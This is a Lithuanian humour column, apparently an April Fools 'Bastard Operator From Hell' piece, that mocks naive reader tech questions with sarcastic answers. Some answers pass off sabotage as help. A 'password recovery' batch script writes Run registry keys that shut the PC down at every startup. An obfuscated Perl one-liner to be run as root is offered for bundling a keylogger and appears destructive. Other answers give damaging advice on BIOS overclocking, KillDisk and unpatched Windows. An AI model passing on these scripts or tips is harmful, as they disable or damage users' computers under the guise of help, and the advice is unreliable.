Tinklapis kraunasi...
Pasidalinti
Susisiekite
//Rimti atsakymai į dar rimtesnius klausimus :D

Rimti atsakymai į dar rimtesnius klausimus :D

<%image(lol.jpg|464|350|LOL)%>

Elvinas Piliponis
2008 Balandis 1, Kompiuterija

Nagrinėdamas „Kompiuterijos” žurnalui užduodamų klausimų sąrašą, pastebėjau, kad jau senokai neatsakiau nei į vieną klausimą, saugomą kataloge „Gudrūs”. Per porą metų jame susirinko gana daug rimtų ir vertingų klausimų, kuriems atsakyti geresnės dienos vargu ar galima surasti.

BOIP Karštoji linija. Jei atpažinsite savo kūrinius – vertėtų rimtai pamąstyti ir paieškoti kur slypi problema ir ar kompiuterį tikrai naudojate pagal paskirtį? Paprastai kompiuteris turi dirbti – žmogus galvoti. Jei šios taisyklės nesilaikoma, labai dažnai pasitaiko PEBKAC arba ID-Ten-T (ID10T) tipo gedimai.

Taigi, nuolankus jūsų tarnas, retsykiais dirbantis BOIP (angl. BOFH) skyriuje, atsako į jūsų klausimus ( Klausimų tekstas netaisytas. Atsakymų stilius maksimaliai priderintas prie klausimų.).

* vardas: kristina. klausimas: norejau paklausti… ar yra tokia svetaine ar programa kuri man pasakytu, logino slaptazodius? ir kokia,ir kur ieskoti?
atsakymas: Žinoma, kad yra. Jei jos nebūtų, tai kokia gi būtų prasmė laužyti galvas ir kurti sudėtingus slaptažodžius, kuriais reikia apsaugoti savo loginus?.. Tačiau būsime „skrudžas” ir adreso jums nesakysiu. Nepaisant to, kad jūs esate mergina

* vardas: meskiox. klausimas: http://img87.imageshack.us/img87/303/screenhunter2ft8.jpg kazkada siunciau kazka ir kai parsisiunciau aplink logotipus atsirado tai? ka daryt?
atsakymas: Na, sprendžiant iš labai išsamaus ir klausimo (iliustracijos nuoroda, tikrai nereikalinga ir veltui gaišote laiką), galiu beveik 100% tikslumu teigti, kad pakaks pašalinti tą kažką ir tai vėl dings.

* vardas: Paulius. klausimas: Kokios kainos dabar yra DDR 400 ram?
atsakymas: Atlikęs išsamų ir sudėtingą rinkos tyrimą galiu pasakyti, kad ši prekė yra labai deficitinė ir todėl kainos labai aukštos. Jei ši prekė domina, tai jūsų laimei nuo caro Rūriko laikų turiu užsisaugojęs keletą kaulikų, kuriuos galiu jums parduoti pigiau, nei rinkos kaina. Na taip, po 500 litų už vienetą.

* vardas: aleksandas. klausimas: ijungus kompiuteri rodo rundul erorr ka reikia daryti???
atsakymas: Jūs tikras, kad ten parašyta būtent tai? Manau, kad turėjo būti budul error. Nesvarbu, tokios problemos paprasčiausiai taisomos „KillDisk” tipo programomis.

* vardas: remigijus. klausimas: mano kompiuterio klaviatura sugedo o norint yjunkt kompiutery reik surinkt pasvorda. pabandziau nusipirkt kita klaviatura bet ji vistiek nevekia po to nusipirkau dar dvi ir tos neveike. Tai kaip man db ysijunkt kompa? Kaip nulaust pasvorda?
atsakymas: Greičiausiai per mažai nusipirkote. Klaviatūrų skaičius turi bent jau tiesiogiai proporcingas slaptažodžio simbolių skaičiui. Na, o kompiuterio slaptažodžiai laužomi gana paprastai. Kompiuterio slaptažodis laikomas atmintinėje, kurios turinys sinchronizuojamas su laikinąja atmintine pagrindinėje plokštėje. Taigi, išėmus atmintinės modulius ir po kurio laiko juos įstačius atgal, slaptažodžio nebeliks, nes moduliuose esanti informacija bus išsitrynusi. Jei nepadės – operaciją pakartoti, pageidautina neišjungus kompiuterio iš elektros tinklo…

* vardas: Kestutis. klausimas: Kaip susikurti serveri atskirai universiteto katedroje? aciu
atsakymas: problema gerai žinoma, nes pačiam teko grumtis su universiteto kirviais ir paranojikais adminais. Pats patikimiausias ir paprasčiausias būdas – atsinešti savo namų kompiuterį ir paleisti visas norimas paslaugas jame. Net negalvokite apie serverinę operacinę sistemą, tai nukriošusių paranojikų sysadminų išmislas. Puikiausiai tiks „Windows 98” ar „Windows 2000/XP” (darbui pasparinti, rinkitės versiją be pataisų rinkinio, nes pastarieji labai lėtina OS darbą). Tinklo kabelis taip pat ne problema – paimkite iš artimiausio komutatoriaus jums patinkantį. Viską padarius, nepamirškite užregistruoti savo naują serverį visose galimose paieškos sistemose, būtinai nurodydami populiariausius raktažodžius: porn, pr0n, sex, drugs, xxx ir pan.

* vardas: Aurimas klausimas: kada atsiras sisi zaidimas? Rig’N’Roll dero gal kas zn? atrasykit? i el.pasta/
atsakymas: Jei atmintis nepaveda, tai sisi žaidimai turėtų baigtis ankstyvoje vaikystėje. Vėliau paprasčiausiai nuleidžiame ar nupilame. Na, bet grįžtant prie reikalo, žaidimas tikrai pasirodys šiame šimtmetyje. Jei norite tiksliau, pasiklauskite pas šia simpatišką ponią.

* vardas: Marco. klausimas: Kaip kompiuteryje pasididinti GHz kiekį? Nejau reikia pirkti nauja procesoriu?
atsakymas: Baikit juokus! Naujus procesorius perka tik „lameriai” ir „lūzeriai”. Tikri h@x0riai „turbina” savo sistemas. Tiesiog atverkite kompiuterio BIOS nuostatas ir nustatykite maksimalius dažnius „CPU Settings”, „Advanced Chipset Configuration” ir pan nuostatų skiltyse. Belieka tik pasirinkti „Save and Exit” ir palinkėti jums sėkmės, naudojantis „nauju” spartesniu kompiuteriu…

* vardas: Dainius. klausimas: Kokios motinines plokstes siuo metu geriausios ir kokios vaizdo plokstes?
atsakymas: Tos, kurios yra pas pardavėją sandėlyje. Netikite? Paklauskite patys!

* vardas: Vitalijus. klausimas: Turiu stalker zaidima bet negaliu paleist,praso disko rakta.kur ji galima gaut? Gal jus turite? aciu.
atsakymas: Savaime suprantama, kad žaidimą, jūs įsigijote iš vietinės FTP ar panašios programų platinimo tarnybos (programas perka tie patys, kurie „neturbina” savo sistemų. žr. aukščiau). Raktai platinami populiariame astalavista portale, kurį būtina naršyti senomis „Internet Explorer 6” naršyklėmis. Naujesnės negalės išnaudoti visų portalo galimybių, taigi jūs negalėsite mėgautis visais žaidimo privalumais. Blogiausiu atveju galite paskambinti +370 800 50000 telefonu ir išdėstyti savo problemą. Nors šie žmonės paprastai yra smarkiai užsiėmę verslo vartotojų aptarnavimu, tačiau manau jie gali rasti šiek tiek laiko ir individualiems kompiuterių vartotojams.

* vardas: Justukas. klausimas: IS KUR GERIAUSIA SIUSTIS VEIKSMO ZAIDIMUS?
atsakymas: Žr. ankstesnio klausimo atsakymą.

* vardas: Modestas. klausimas: labas chebra.Matau kad patarimo ir cia turbut negausiu nes dar nezinot kaip slaptazodi pakeist.EINAM PRIE REIKALO: vienu zodziu turiu counter-strike 1.6 tai toks zaidimas man perinstaliavo windowsus ir jis neveikia and OPEN GL modo.tai va man reik patarimo koki nvidia driveri (arba jo updeita atsisiust ir is kur)… viskas tai tiek…
atsakymas: O, hillowa. Ishkart matosi kad savas bichas. Tiesa gal kiek neapsisprendes ar nori patartyj ar paklaustyj. Neko… Ish esmes suprataw tava trabla, tik patikslink, kas tas opengl ir driveris? a? Taj tek cia ya!.. chew brashke.

* vardas: vitas. klausimas: kap atsikratyti YAHOO com ir visko ten?
atsakymas: Na šiuo klausimu aš beveik bejėgis. Pabandykite kreiptis tiesiai į „Microsoft”, ji kaip tik ketino nupirkti visą „Yahoo” kompaniją, tik ši kažkodėl tai spyriojosi. Kaip kokie tai ožiai, jiems siūlo 40 mlrd., o jie atsisako ir dar jums trukdo.

* vardas: arturas. klausimas: jei galit i sy klausima, kai atsakysite , atsiuskite man zinoti, i emaila, kad jau atsakymas gatawas 😉 krc taip: esu dainininkas turiu gera wokala, yra tik klausimas: kaip reikia turint melodija -mp3 formatu, ikelti sawo wokala????? kokiomis programomis naudotis… aciu… manau atsake i sy klausima atsiras daugiau konkurentu i eurowizija ( zinoma ne minedu 😉
atsakymas: Eech… Gaila nespėjau anksčiau atsakyti… Turbūt per mano aplaidumą tikrasis talentas liko nepastebėtas, o Lietuva ir vėl nelaimėjo „Eurovizijos”. Mea culpa. Nuoširdžiai atgailauju, internete susiradęs dvasinei rimčiai bei susikaupimui tinkamiausią kūrinį – „Dope – Die Mother Fucker Die„.

* vardas: Ema. klausimas: Kokie yra visi blogi kompiuterio efektai zmogaus sveikatai?
atsakymas beveik rimtai: O ką, iš klausimų nesimato?

* vardas: mergyte. el_pastas (padariau išimtį, nes labai derinasi su klausimu): nieksele@populiarus portalas klausimas: Labai reikia pagalbos,matau daugeliam tokios pat..kaip butu galima email pasworda nulaust…:o ? galit kas nors paaiskint tikrai atsilyginciau kaip nors…nes lbj rejkia
atsakymas: Na čia kiek sudėtingesnė problema, kuriai spręsti prireiks šiokių tokių programų rašymo žinių. Laimei „Windows” sistemos yra aprūpintos visomis reikalingomis priemonėmis, tokio pobūdžio programoms kurti. Sužadinkite „Notepad” tekstų rengyklę (Spragtelite „Start”, „Run” lauke įrašote notepad) ir rengyklėje surenkate šį tekstą
@ECHO off
CLS
ECHO „REAL H@X0R MAIL SYSTEM HACKING SCRIPT”
ECHO „BEGIN PASSWORD RECOVERY PROCESS”
COPY %0 C:%0_1.bat
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >> temp.reg
ECHO „ownage”=”shutdown.exe -s -t 00” >> temp.reg
ECHO [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun] >> temp.reg
ECHO „ownage”=”shutdown.exe -s -t 00” >> temp.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >> temp.reg
ECHO „backup1″=”C:%0_1.bat” >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00
ECHO „GUESSED MAIL SYSTEM PASSWORD IS:”
ECHO %1
Išsaugokite šią programą kokiu nors pavadiimu, nurodydami plėtinį .bat. „Windows” sistema pespės jus dėl galimų problemų, pakeitus rinkmenos tipą, tačiau mums būten to ir reikia. Du kartus spragtelėkite pele sukurtą programos failą ir atsakykite teigiamai į sistemos perspėjimus apie sistemos Registro modifikavimą (jis būtinas, slaptažodžio atkūrimo procesui pradėti). Dabar belieka tik palaukti, kol pradės matytis pirmieji rezultatai. Paprastai – gana greitai.

* vardas: Anonimas. klausimas: Parsisiunciau Windows XP ir noriu perrasyt , bet kur rasti product key?
atsakymas: „Product key” ir gaminių aktyvavimo klausimais jums turėtų paslaugiai padėti, paskambinus +370 800 50000 arba +370 5 2051151 telefono numeriais.

* vardas: arminas. klausimas: kaip reikia ideti stalker dvd diska i cd diskasauki plyzz
atsakymas: Elementariai, paspaudžiate CD-ROM atidarymo mygtuką, atidarote dėžutę, išimate DVD diską, įstatote į stalčių ir paspaudę tą patį atidarymo mygtuką, uždarote stalčių. Viskas.

* vardas: Dominykas. klausimas: Noriu ismokti ideti i koki nors setupa perfect keylogger.Gal galetu kas nors per e-maila issamiau paaiskinti kaip padaryti kad kitas kas issiraso setupa kartu jam susiinstaliuoja ir perfect keylogger.Labai prasau padekite.
atsakymas: Na, čia jau kiek sudėtingesnis programavimo klausimas. Bijau, kad aukščiau esantis pavyzdys nepadės. Galima pabandyti kitą Perl sistemos komandą, sėkmingai sujungiančią keletą failų į vieną. Tačiau jai įvykdyti būtinas Perl interpretatorius, kurio „Windows” sistemose paprastai nėra. „Windows” sistemose „Perl” interpretatorių paprastai galima gauti atsisiuntus ir įdiegus „Cygwin” sistemą. Tačiau galima pasinaudoti ir kokiu nors didesniu „Linux Live CD” disku. Iš jo reikėtų įkrauti kompiuterį, prijungti disko skirsnius ir komandinėje eilutėje atverti katalogą, kuriame jau turėtų būti padėtas Setup’o failas ir paruoštas Keylogegris. Įsitikinkite, kad jūs turite teisę rašyti į tą katalogą, geriausia tapti „root” vartotoju („Ubuntu” prieš vykdomą komandą parašyti „sudo”, „Knoppix” – įvykdyti komandą „su -”). Tuomet sužadinti komandą (ją tiksliai nukopijuokite į vieną eilutę):
cat „Concating files in current directory. Please wait.” | perl -e ‘$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' * vardas: kestas. klausimas: kokią kurt video programą pasiūlytumėt
atsakymas: Gerą, pageidautina, kad programa leistų suspausti „Blu-Ray” diską iki CD (na bent jau DVD) dydžio, neprarandant kokybės. Taip pat reikalinga efektų rengyklė, leidžianti pakeisti objektus filmuotoje medžiagoje ir sudėti savo nuotraukas vietoje Holivudo aktorių.

Tai tiek atsakymų. Beje, simboliškai, paskutinis klausimas buvo gautas 2007 balandžio 1 d. Taip pat skaitantiems siūlau nepamiršti, kad atsakymus rengė BOIP skyriaus darbuotojas. Tiem, kas dar nesuprato arba nesugebėjo išsiversti originalaus pavadinimo – verčiu: Bjaurybė Operatorius Iš Pragaro.

Paskubėjusiems pasinaudoti patarimais, belieka palinkėti sėkmės… Jos tikrai gali prireikti… 😀 😀 😀

  • 237 views
  • 0 Komentaras

Leave a Reply

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *

Reklama

2004 - 2023 © Dainius Pilypas | Talpinimas ir administravimas: HostIN.lt
Susisiekite
Uždaryti